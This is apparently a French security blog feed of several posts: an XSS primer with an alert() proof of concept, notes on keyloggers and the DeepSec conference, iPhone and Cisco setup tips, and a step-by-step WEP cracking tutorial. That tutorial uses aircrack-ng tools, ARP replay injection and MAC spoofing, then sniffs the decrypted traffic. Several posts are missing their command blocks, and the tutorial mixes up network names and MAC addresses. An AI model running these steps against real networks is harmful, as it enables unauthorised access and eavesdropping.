Mais qu’est ce que le XSS ?
Le XSS, de l’anglais cross site scripting, consiste à injecter et faire interpréter ou mieux, faire exécuter du code non attendu à un navigateur web. De cette définition, on peut en déduire que l’attaque ne se situe pas du côté du serveur mais plus plutôt du côté client, en d’autres termes une action du client final est nécessaire. Donc nous avons un aspect ingénierie sociale. De plus, ce genre d’attaque ne se limite pas à un langage. Tout langage reconnu par votre navigateur peut être exploité. C’est pourquoi les failles XSS sont souvent basées sur de l’HTML et du Javascript. Pour finir la première partie de sensibilisation, la vulnérabilité XSS figurait à la première place du top ten de l’OWASP en 2007. En 2010 il occupe la seconde place.

Prenons un exemple concret, vous recevez un mail de votre banque qui vous indique que de nouveaux documents sont disponibles à partir de votre compte et ils vous donnent un lien pour accéder aux ressources. En tant qu’utilisateur vous ne fait pas attention à l’url caché derrière le nom du lien et vous cliquez pour accéder à vos documents. A ce moment précis le mal est fait ! Vous ne vous êtes rendu compte de rien du tout mais votre requête à été intercepté par un autre site qui a volé vos identifiant de votre banque. Vous n’avez rien remarqué car vous avez été redirigé. Ce scenario semble sortir tout droit d’un James Bond, malheureusement, il est bien plus probable qu’un des scénarios de James Bond. Bien entendu, il y a quelques conditions. Ce scénario considère que le site de votre banque contient un champ vulnérable aux attaques XSS, que l’attaquant connaisse votre adresse mail, et qu’il ait un serveur distant ou il pourra stocker vos identifiants de connexion. Il est considéré également pour acquis que vos identifiants soit stockés dans un cookie. Vous me direz que cela fait beaucoup de conditions, même si la dernière est peu répandu (surtout pour un site bancaire) les autres conditions sont facilement réalisables.

Voici une schématisation du scénario énoncé.

Alors comment fonctionne concrètement cross site scripting, et bien la syntaxe la plus connue est l’exécution dans un champ non validé du code suivant :

<script>alert('Hello World')</script>

Il a pour but une fois interprété par votre navigateur, d’afficher la pop up suivante :

C’est exemple est souvent utilisé comme PoC (Proof of Concept). Mais il existe beaucoup plus de combinaison possible. Ce billet n’a pas pour vocation de faire une liste exhaustive des éléments à parser dans vos champs. Il existe de très bonnes sources si vous cherchez ce genre d’information, comme par exemple le site ha.ckers.org. Cependant il faut comprendre que ce genre d’attaque est bien plus dangereuse pour l’utilisateur final que pour les serveurs. Grâce à l’utilisation de champ ou de paramètre non validé, il est possible également de ré-écrire une page web (via l’API DOM). Je vous invite à lire l’article de Pierre Gardenat qui a été publié récemment dans le magazine français MISC (édition Mai/Juin 2010). L’article est très bien détaillé. Je me suis permis de reprendre son titre que j’aime beaucoup. J’espère qu’il ne m’en voudra pas.

–
source
Pierre Gardenat – XSS : de la brise à l’ouragan

Twitter ce billet

Il existe deux classes de keylogger, les versions matérielles et logicielles. La version matérielle est vraiment très simple à mettre en place. On peut imaginer différents scenarios, il suffit d’avoir accès physiquement à la machine pendant quelques secondes. Vous allez me dire que cela  fonctionne uniquement avec les versions filaires, mais malheureusement non ! Il existe aussi des versions de keylogger capable d’intercepter les informations envoyées en bluetooth. Il est difficile pour un utilisateur de remarquer ce genre d’intervention.

La version logiciel

Souvent les fonctionnalités offerte par ce genre de keylogger sont plus diversifiées car ils permettent d’une part d’obtenir tout ce  que vous tapez sur votre clavier mais également de savoir quels logiciels vous utilisez. De plus, ils permettent de capturer vos flux audio et vidéo. L’inconvénient de ce genre de keylogger c’est qu’il commence à enregistrer seulement une fois votre système d’exploitation démarré. Ce qui vous empêche d’obtenir les mots de passe BIOS, ou encore les mots de passe d’encryption de disque dur. Ce genre de keylogger est facilement détectable si vous avez un antivirus digne de ce nom. Pour information les force jaune, force bleu et force rouge détectent facilement ce genre de logiciel (à comprendre Symantec, Checkpoint et McAfee).

La version matériel

Cela ressemble la plus part du temps à un clé USB, cela se branche entre votre clavier et votre ordinateur. Il existe des modèles PS2 et USB. La marque la plus reconnu dans le domaine est Key Ghost. Personnellement, j’ai la version KeyGhost SX 512 Ko et KeyGhost USB. Ce qu’il faut savoir, c’est qu’il n’existe actuellement aucun logiciel de sécurité capable de faire de la prévention de keylogger sur le port PS2. Donc si vous utilisez encore des claviers PS2 je vous conseille vivement de changer de clavier. En ce qui concerne les claviers USB, lorsque vous le connectez, votre clavier fait une entrée dans votre base de registre avec un HID qui est propre à votre clavier. Si maintenant vous connectez un hub USB et ensuite votre clavier, vous allez voir que cette valeur va changer. C’est précisement sur ce paramètre que les logiciels de sécurité se basent afin de faire la prévention. Vous comprendrez que ce système à ces limitations car si vous changez de clavier, le logiciel va penser que vous avez un keylogger de connecté. Cependant la manière de faire la plus sûre. Vous aurez compris que ce genre de keylogger a un grand avantage (ou inconvénient tout dépend comment l’on se place) car ils permettent de capturer à n’importe quel moment les touches saisies sur votre clavier. Et ceci indépendamment de votre système d’exploitation. Il existe également des keyloggers matérielles pour les ordinateurs portables, allez jeter un coup d’oeil sur le site web de www.keycarbon.com, c’est assez impressionnant.

Avec l’arrivée en masse des claviers bluetooth, il était normal de voir débarquer les keyloggers bluetooth. Avec ce genre de keylogger vous êtes capable de capturer des informations jusqu’à 300 mètres de distance. A ce sujet j’ai assisté à une présentation de ce genre d’attaque pendant la conférence DeepSec à Vienne. L’équipe remote-exploit nous présenté leur projet KeyKeriki. Pour rappel, il nous montré avec quel facilité ils étaient capable d’envoyer des informations à un récepteur bluetooth de marque Microsoft.

–
Sources

http://www.keycarbon.com
http://www.keyghost.com
http://www.wirelesskeylogger.com
http://en.wikipedia.org/wiki/Keystroke_logging
http://www.remote-exploit.org/?page_id=187

Twitter ce billet

A croire que la journée était dédiée aux GSM, car le talk suivant présenté par Karsten Nohl, nous expliquait comment il était facile de décrypter l’encryption des communications GSM. Dans un premier temps, la méthode dite active consiste à proposer au téléphone un relai avec un très bon signal afin de le forcer à se connecter dessus (nécessite de la proximité). Une fois connecté, toutes les communications du téléphone peuvent être écoutées. La seconde méthode dite passive, n’est pas encore au point face à l’encryption A5/1. Le principe est similaire à du brute force à l’aide de rainbows tables. D’ailleurs si vous souhaitez les aider dans leurs travaux, vous pouvez toujours proposer vos services en contactant Karsten Nohl. Ils possédent une mailing list pour rester au courant de leur progession et aussi un site web qui donne un peu plus d’explications sur leur recherche.

Le talk suivant présenté par Thorsten Schröder de Remote-Exploit.org portait sur l’écoute des communications de clavier Bluetooth. La présentation était très intéressant, notamment on y apprends que les claviers Bluetooth de Microsoft sont composés de puces AES qui leurs permettraient d’assurer une meilleure sécurité de la communication mais ils continuent d’utiliser une méthode basée sur des contrôles XOR. Il nous démontre, à l’aide d’un petit émetteur Bluetooth fait maison, comment il arrive envoyer une série de commandes sur un récepteur Bluetooth Microsoft. Vous trouverez en ligne la démo ainsi que des explications sur la méthode utilisée.

Le dernier talk de la matinée présenté par deux italiens a définitivement clôturé les présentations intéressantes (du moins pour ma part). En effet, l’après midi n’était pas aussi intéressante en termes de sujet (les sujets abordés m’intéressais moins). Revenons à la présentation des italiens, qui reprenait en grande partie les travaux de Zane et Luis mais d’une manière différente. Ils ont montré comment ils arrivent à changer à distance, via un SMS, l’APN du téléphone cible. Une fois l’APN changé (un APN proxy), ils arrivent à voir toutes les trames HTTP et HTTPS du client. Le téléphone cible n’a plus aucun secret pour eux. Assez terrifiant …

La conférence DeepSec édition 2009 s’est clôturée sur une soirée au Metalab ou tout le monde étaient conviés. C’était l’occasion pour lancer quelques lightening talk (des présentations de courte durée). Le sujet principal était le recensement des pirateries effectués durant la conférence à l’hôtel :

• Connexion internet pour 1 euros en utilisant un champ caché
• La capture des trames TCP des caméras de surveillance sur un réseau sans fils non protégé
• L’accès au menu de la TV payante de l’hôtel via un code disponible chez le constructeur

Twitter ce billet

Dans un premier temps, changez le mot de passe du compte root en utilisant le terminal ou par SSH:

Ensuite, éditez le fichier de configuration de votre serveur SSH afin de bloquer l’accès au serveur pour le compte mobile :

Allez à la fin du document avec la commande “: $”, passez en mode édition avec “: i” puis insérez la ligne suivante :

Sauvegardez avec la commande “: wq”.

Et voilà le tour est joué, votre iPhone est maintenant sécurisé.

Twitter ce billet

Pour en revenir au Workshop, la dernière journée a été très intéressante, nous avons pu nous exercer sur différentes vulnérabilités comme les failles XSS/XSRF, les injections SQL ou encore les manipulations JSON. Nous avons vu également comment décompiler du Flash et comment obtenir le code source d’application réalisée avec Silverlight. Pendant une bonne partie de la journée les deux sites Web (un site de commerce de DVDs et une application bancaire) mis à disposition ont subi toutes les attaques possibles. Nous avons fait la connaissance du Framework BeEF qui s’est révélé très utile pour concrétiser des attaques de type XSS.

Entre temps, en discutant avec d’autres personnes, nous avons obtenu la connexion internet de l’hôtel pour 1 euros en exploitant un champ caché . D’autres se sont amusés à capturer les trames TCP des caméras de surveillance isolées sur un réseau sans fil sans protection.

Aujourd’hui, c’était la première journée de conférence. Il y a deux salles soit deux sessions simultanées. Comme d’habitude, il faut bien choisir son talk sous peine de subir 50 minutes de …
Je ne sais pas si j’ai bien choisi mes talks ou si tous les speakers étaient bon (à quelques exceptions près…) mais je n’ai pas été déçu par la qualité des speakers.

La première session que j’ai suivi fut le Top 10 des problèmes de sécurité dont les développeurs ne se doutent pas. Présenté par Neelay S. Shah de chez Foundstone, la présentation était accès sur des attaques dont la plus part nécessite un accès à la machine. Petite anomalie, la présentation contenait 9 et pas 10 attaques (j’en ai peut être raté une, faut dire qu’il était 10h… non faut pas le dire). Voici la liste que j’ai recensé peut être que quelqu’un me dira si j’en ai oublié :

• Socket Hijacking
• Using named pipes
• Mutex/Events
• Insecure Process Creation
• Cipher modes
• Insecure Integrity Checking
• ActiveX Controls
• Third Party Components
• Thick Client Applications

Dans l’ensemble la présentation était bien mais loin d’être la meilleure.

Le speech suivant était présenté par Saumil Shah qui travaille pour net-square dont il est le fondateur. Sa présentation, intitulé Ownage 2.0, portait sur les différentes menaces du Web 2.0. Très humoristique, on sent qu’il est à l’aise avec l’auditoire. Il commence à introduire son speech par l’évolution des applications web, qui en résumé sont de plus en plus complexe avec des utilisateurs de moins en moins informés. Il avait un joli slide pour montrer que les attaques prennent de plus en plus la route du port 80. Il nous démontre avec facilité comment nous pouvons être vulnérable avec des fichiers PDF (installation d’une barre d’outil dans le navigateur à l’ouverture du PDF).

Felix Gröbert nous présente son Proof of Concept d’une attaque basé sur un smart card reader de classe 1 utilisé par une application bancaire de la CommerzBank. La technique utilisée repose sur la condition d’utiliser une vieille version de FireFox (1.5).

Cloud Services – still too cloudy for take off? est l’intitulé de la présentation de Kurt Kammerer. Il travaille pour Regify. Il explique les comportements des différents acteurs d’un service informatique par rapport aux coûts et aux projets. Le sujet me semble pas coller avec la sécurité mais bon sa présentation illustrée de photos comique a provoqué plus d’une question. La dernière image de sa présentation que je garde à l’esprit c’est la photo d’un renard avec une cicatrice qui représente l’IT manager, un chien enragé qui représente le CEO et un chien de race Husky avec le regard vide représentant le CFO. Voici l’image de son dernier slide qui résume bien sa présentation.

Get Your head out of the clouds : Security in software-plus-services
Ce talk était digne d’un commercial. John Walton de chez Microsoft nous a présenté les différents services revendu par Microsoft et surtout leurs intérêts. Un peu trop de marketing pour moi … mais bon il en faut pour tous les GÜ .

Pendant la pause, nous avons profité du stand de Lockpicking pour s’exercer un peu. J’ai enfin pu m’essayer au bumping. Pour information, le bumping est une technique de lockpicking qui permet d’ouvrir des serrures en frappant la clé.

Morgan Mayhem connu sous le pseudonyme headhntr nous a présenté les vulnérabilités de mac OSX (The Kingdom of the blind: OSX Incident Response). Cet américain, qui travaille pour Google dans leur bureau de Zurich, est venu sur l’estrade avec des airs de Jack Sparrow. Pendant sa présentation, une bière à la main, il a sensibilisé les personnes aux risques d’utilisation de Mac OSX. Il a surtout cassé le mythe en montrant les différents malware développé pour OSX.

Le dernier talk que j’ai suivi était sur les risques de Twitter. Ben Fenstein nous a montré les différents risque que comporte Twitter en commençant par les failles XSS jusqu’au Bot C&C. Présentation intéressante.

Twitter ce billet

Concernant les Workshops, ce n’est pas moins de huit training qui sont proposés. Pour ma part j’ai suivi le workshop Web 2.0 Security – Advanced Attacks and Defense présenté par Vimal Patel & Prashant Thakar (Blueinfy Solutions Pvt. Ltd.). Les deux indiens connaissent bien le sujet et leur présentation est rodée. Les travaux pratiques sur le protocole AMF pour les applications Flex sont prometteurs, nous verront ça demain. Pour le reste, la plus part du temps, le contenu a pris des airs de refrain, mais la soirée fut très original.

Après une petit heure de piscine, nous avons été manger la célèbre Wiener Shnitzel dans un petit restaurant du centre. Accompagné d’un des organisateurs de la conférence, nous avons eu droit a une visite guidé quelque peu spéciale. En effet, nous nous sommes rendu dans le quartier 21 ou se loge une organisation connu sous le nom de quintessenz qui lutte pour la restauration des droits civils en termes d’informatique.

Ils décernent chaque 25 Octobre des Big Brother Awards à chaque organisation, société qui ne respectent pas les droits civils et la vie privée des gens. Autant vous le dire tout de suite ce sont des passionnés qui ne comptent pas leurs heures.

Autre endroit, autre style, nous nous sommes rendu dans un Hackerspaces. Nous avons eu le droit à un petit tour du propriétaire et surtout à une démonstration de la découpeuse au Laser. Ce lieu appelé le club-metalab, regorge d’appareil fait maison. Que ce soit un mur de verre illuminé programmable via une interface web, ou encore une mallette contenant trois hot spot wifi disséqués et inter connectés, ce ne sont pas les idées qui manquent. Les installations ont un style un peu underground assumé. Chaque personne que nous avons croisé avait une bouteille de Club-Mate à la main, un breuvage qui apparemment les maintiens en éveille. Notre petit groupe de visiteur nocturne était bien content de rentrer après cette escapade.

Twitter ce billet

Le premier requis est d’avoir la bonne version d’IOS installé, en l’occurrence la fonctionnalité ip sla est disponible à partir de l’IOS 12.4 avec le feature set advanced IP services ou advanced security. Pour rappel, vous trouverez la procédure pour mettre à jour un IOS Cisco ici. Voici un petit schéma qui reprends l’énoncé précédent.

Cisco IP SLA

Voici la configuration nécessaire au bon fonctionnement de votre loadbalancing :

Sources :
http://www.blindhog.net/cisco-dual-internet-connections-without-bgp
http://hypergressive.blogspot.com/2009/03/dual-isp-load-balancing-configuration.html

Twitter ce billet

Twitter ce billet

Je me suis dit qu’il pouvait être utile d’avoir un plan de secours des activités possible lorsque Twitter n’est plus là :
0. Travailler
1. Discuter à propos de Twitter sur FriendFeed
2. Discuter à propos de Twitter sur Facebook
3. Discuter à propos de Twitter sur MSN
4. Laisser un commentaire sur un blog au sujet de Twitter
5. Discuter de Twitter via SMS
6. Discuter de Twitter via Mail
7. Ecrire un article sur Twitter
8. Penser à propos de Twitter
9. Rêver aux prochains tweets que vous allez poster
10. Sortir dehors

Si vous avez d’autres idées, n’hésitez pas.

Mise à jour le 08/08/2009 10:27

Twitter ce billet

Actuellement nous avons les différents types d’authentification suivants :

• WEP Open ou Shared Key
• WPA PSK avec encryption TKIP ou AES
• WPA Enterprise avec encryption TKIP ou AES
• WPA2 PSK avec encryption TKIP ou AES
• WPA2 Enterprise avec encryption TKIP ou AES
• 802.1x

Sur ces différents modes d’authentification, il y a bien entendu le WEP qui est complètement obsolète, et le protocole d’encryption TKIP qui contient des faiblesses découvertes par deux chercheurs allemands en novembre 2008.
Je ne vais pas refaire une biographie complète du WEP car il en existe déjà beaucoup sur internet. Mais je vais vous montrer (à nouveau car pour certain ce n’est pas clair visiblement) comment il est facile de casser une clé WEP.

Personnellement j’utilise le live CD backtrack 4 qui contient tous les outils nécessaires pour notre démo.

Pour la suite de la démonstration, on prendra pour acquis les éléments suivants :

• MAC adresse du point d’accès cible : 00:CA:FE:BA:BE:FF
• MAC adresse du client connecté sur le point d’accès : 00:BA:BE:CA:FE:FF
• BSSID du point d’accès cible : POVWEP

Dans un premier temps, je mets ma carte wifi en mode monitor :

airmon-ng start wlan0

Puis je lance airodump-ng, il permet de scanner les réseaux wifi. Airodump-ng est simple d’utilisation.

Usage: airodump-ng


Airodump-ng offre une multitude d’options et de filtres afin de cibler ce que l’on souhaite surveiller.

Options airodump-ng:

-w permet de créer un fichier de capture dans lequel seront enregistrés tous les paquets.
Exemple: airodump-ng -w out wlan0

–encrypt permet de filtrer les réseaux en fonction du type d’encryption utilisé.
Exemple: airodump-ng –encrypt wep wlan0 (seuls les réseaux en WEP seront affichés)

-c permet de cibler l’écoute sur un canal wifi particulier.
Exemple: airodump-ng -c 10 wlan0 (airodump-ng n’écoutera que le canal 10)

–bssid permet de ne cibler qu’un seul point d’accès en fonction de son adresse mac.
Exemple: airodump-ng –bssid 00:CA:FE:BA:BE:FF wlan0 (airodump-ng ne surveillera que le point d’accès dont l’adresse mac est 00:CA:FE:BA:BE:3F)

Donc si je veux faire un tour d’horizon ce que qui ce passe dans le coin, je lance :

airodump-ng wlan0

Je peux apercevoir que le point d’accès 00:CA:FE:BA:BE:FF a du WEP et un client connecté. Parfait, nous pouvons commencer. On lance un autre airodump qui va créer un fichier de capture. Ce fichier de capture sera utilisé par aireplay pour rejouer les ARP (injections de paquets).

airodump-ng -w out -c 10 –bssid 00:CA:FE:BA:BE:FF wlan0

Maintenant que nous sommes focalisé sur notre point d’accès et que nous avons un client connecté, nous pouvons tenter de nous associer au point d’accès avec aireplay :

aireplay-ng


Voici les différentes options de aireplay :

–deauth count : deauthenticate 1 or all stations (-0)
–fakeauth delay : fake authentication with AP (-1)
–interactive : interactive frame selection (-2)
–arpreplay : standard ARP-request replay (-3)
–chopchop : decrypt/chopchop WEP packet (-4)
–fragment : generates valid keystream (-5)
–caffe-latte : query a client for new IVs (-6)
–cfrag : fragments against a client (-7)
–test : tests injection and quality (-9)

On utilise l’option -1 fakeauth (association & authentification) pour notre test :

aireplay-ng -1 0 -e POVWEP -a 00:CA:FE:BA:BE:FF -b 00:CA:FE:BA:BE:FF -h 00:BA:BE:CA:FE:FF wlan0

POVWEP: essid (nom du réseau wifi)

00:CA:FE:BA:BE:FF: adresse mac du point d’accès

00:BA:BE:CA:FE:FF: adresse mac du client (“station” sous airodump-ng)

wlan0: notre interface wifi

Maintenant nous pouvons lancer notre attaque par rejeux d’ARP (injection de paquets). On utilise l’option -3 standard ARP-request replay (rejeu d’arp) :

aireplay-ng -3 -e Livebox-a1b2 -a 00:CA:FE:BA:BE:FF -b 00:CA:FE:BA:BE:FF -h 00:BA:BE:CA:FE:FF -x 600 -r out-01.cap wlan0

POVWEP: essid (nom du réseau wifi)

00:CA:FE:BA:BE:FF: adresse mac du point d’accès

00:BA:BE:CA:FE:FF: adresse mac du client (“station” sous airodump-ng)

600: nombre de paquets par secondes qui seront injectés (à régler en fonction de la qualité du signal wifi)

out-01.cap: notre fichier de capture airodump-ng

wlan0: notre interface wifi

Il ne reste plus qu’attendre afin d’obtenir 40000 ARP pour décrypter la clé WEP. Une fois vos 40000 ARP dans votre fichier de capture, il ne reste plus qu’à décrypter la clé à l’aide de aircrack.

Aircrack-ng est très simple d’utilisation.

usage: aircrack-ng [options] <.cap / .ivs file(s)>

Dans notre cas, nous allons utiliser la commande suivante :

aircrack-ng out-01.cap

Quelques minutes après vous pourrez voir :

KEY FOUND! [ FA:E6:18:26:27:56:B5:4D:C5:31:40:71:56 ]

Maintenant si le réseau fait du filtrage par MAC adresse vous avez déjà un mac adresse de disponible, utilisez là :

ifconfig wlan0 hw ether 00:BA:BE:CA:FE:FF

Et si le service DHCP n’est pas activé, vous pouvez utiliser wireshark afin de définir l’adressage du réseau. Commencez par lancer wireshark.
Puis configurer wireshark pour qu’il décrypte les paquets avec la clé WEP que vous venez juste de décrypter.

Allez dans Edit\preferences\protocols\IEEE 802.11
puis entrer la clé WEP
Cochez Assume packets have FCS et enable decryption



Vous pouvez commencer à sniffer en allant dans capture\options



Si vous voulez être plus granulaire dans votre recherche vous pouvez faire un filtre sur votre point d’accès :

(wlan.bssid==00:CA:FE:BA:BE:FF) && (tcp)


Vous allez découvrir des choses intéressantes.

Deux formules à retenir (dont une que j’empreinte à sid) :

WPA != PSK + TKIP
WIFI != WEP

Twitter ce billet

]]> http://www.kaizeronion.com/security/wifi-hara-kiri-seppuku-481/feed/ 1